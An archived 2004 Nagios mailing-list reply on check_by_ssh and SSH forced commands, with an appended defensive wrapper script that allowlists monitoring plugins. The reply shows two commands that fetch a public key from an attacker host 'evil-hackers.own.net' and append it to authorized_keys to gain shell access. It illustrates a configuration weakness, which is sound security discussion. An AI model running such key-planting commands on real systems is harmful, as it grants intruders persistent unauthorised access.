check_by_ssh question

Andreas Ericsson ae at op5.se
Thu Mar 25 22:11:18 CET 2004


Matt Pounsett wrote:
> 
> True.  But you can prevent the key from being used to get an interactive
> shell, which was my point.
> 
Yes, you can, actually, since you can still run commands on it.
The 'command' option in the keyfile can only specify one, and exactly 
one command to run when a user is authenticated using that precise key, 
so it can't be set to block certain commands (which is good, since 
inclusive permissions are always harder to bypass than exclusive).
In theory, this prevents us from obtaining a shell, but consider the 
following commands being run:
ssh target -C \
"scp <no-passwd-user>@evil-hackers.own.net:.ssh/id_dsa.pub 
.ssh/unrestricted_auth_key"
ssh target -C "cat .ssh/unrestricted_auth_key >> .ssh/authorized_keys"

And please, don't tell me "that can't happen, because you can configure 
ssh to not be allowed to login without a password". It's totally 
possible to generate a new set of keys for the pseudo-user, copy it to 
your own host's authorized_keys and then take it from there. No 'noauth' 
logins have to take place, but the unrestricted_auth_key still goes into 
the authorized_keys file. Voilà. Shell access.

This CAN of course be bypassed by setting up a horde of different keys 
and specifying the exact command to be run when that particular user 
logs in with the particular private key, but then configuration would be 
such a hassle that I'd be surprised if something didn't fuck up totally 
anyway.

Questions about that?

Hmm... I think I'll start working on ssh style encryption (dsa) for 
nrpe, with public / private key handshake and so on. Seems a bit easier 
than all this hassle.


-- 
Sourcerer / Andreas Ericsson
OP5 AB
+46 (0)733 709032
andreas.ericsson at op5.se
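
As an added example (not part of the message above or of the Nagios project), the single-key form of the command= restriction discussed in the thread: with command= set in authorized_keys, sshd executes the forced command in place of whatever the client asked to run and exports the client's request in SSH_ORIGINAL_COMMAND, so one small wrapper can allowlist a fixed set of plugins for check_by_ssh rather than needing one key per command. The wrapper path /usr/local/bin/nagios-cmd-wrapper, the plugin directory /usr/lib/nagios/plugins, the plugin names and the key line are assumptions.

```shell
#!/bin/sh
# Added example: a forced-command wrapper for check_by_ssh (not from the thread
# or the Nagios project).  Install it as the command= of ONE restricted key in
# ~/.ssh/authorized_keys on the monitored host.  The wrapper path and the plugin
# directory below are assumptions; adjust them for your layout:
#
#   command="/usr/local/bin/nagios-cmd-wrapper",no-pty,no-port-forwarding,no-agent-forwarding,no-X11-forwarding ssh-dss AAAA... nagios@monitor
#
# With command= set, sshd ignores what the client asked to run and executes this
# script instead, exporting the client's request in SSH_ORIGINAL_COMMAND.  Only an
# allowlisted plugin name with plain option tokens is executed, so the key holder
# gets neither a shell nor a way to write into ~/.ssh/authorized_keys.

PLUGIN_DIR=${PLUGIN_DIR:-/usr/lib/nagios/plugins}   # assumed plugin location

# allowed <name>: exit 0 if <name> is a plugin this host agrees to run.
allowed() {
    case "$1" in
        check_disk|check_load|check_procs|check_swap|check_users) return 0 ;;
        *) return 1 ;;
    esac
}

# validate <requested command>: exit 0 only for "<allowed plugin> [args...]"
# where every argument is a plain token (letters, digits, - _ . / , % = :).
# Anything else (a path as the plugin name, quotes, $(), ;, |, >, &, backticks,
# an empty request) is refused.  Nothing here is ever passed to "sh -c".
validate() {
    cmd=$1
    [ -n "$cmd" ] || return 1
    set -f                  # no pathname expansion while word-splitting
    set -- $cmd             # split on IFS into plugin name and arguments
    set +f
    [ $# -gt 0 ] || return 1        # request was only whitespace
    plugin=$1
    shift
    case "$plugin" in
        */*) return 1 ;;            # bare names only; resolved under PLUGIN_DIR
    esac
    allowed "$plugin" || return 1
    for arg in "$@"; do
        case "$arg" in
            *[!A-Za-z0-9_./,%=:-]*) return 1 ;;
        esac
    done
    return 0
}

# run_check <requested command>: validate, then exec the plugin directly with
# the split arguments (no shell re-parsing).  Returns 1 when refused.
run_check() {
    if ! validate "$1"; then
        printf 'nagios-cmd-wrapper: refused: %s\n' "$1" >&2
        return 1
    fi
    set -f
    set -- $1
    set +f
    plugin=$1
    shift
    exec "$PLUGIN_DIR/$plugin" "$@"
}

# Under sshd the client's request is in SSH_ORIGINAL_COMMAND.  If the client
# asked for an interactive shell instead, the variable is unset, the script
# exits, and the session closes: no shell is spawned either way.
if [ "${SSH_ORIGINAL_COMMAND+set}" = set ]; then
    run_check "$SSH_ORIGINAL_COMMAND" || exit 1
fi
```

On the Nagios server, check_by_ssh keeps passing the plugin invocation with -C, for example check_by_ssh -H target -l nagios -C "check_load -w 5,4,3 -c 10,8,6"; on the target that string arrives in SSH_ORIGINAL_COMMAND and is executed only if it names an allowlisted plugin with plain arguments. Requests such as "scp ...", "cat ... >> .ssh/authorized_keys" or a bare shell are refused and logged to stderr, which sshd forwards to the client.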


_______________________________________________
Nagios-users mailing list
Nagios-users at lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/nagios-users
::: Please include Nagios version, plugin version (-v) and OS when reporting any issue. 
::: Messages without supporting info will risk being sent to /dev/null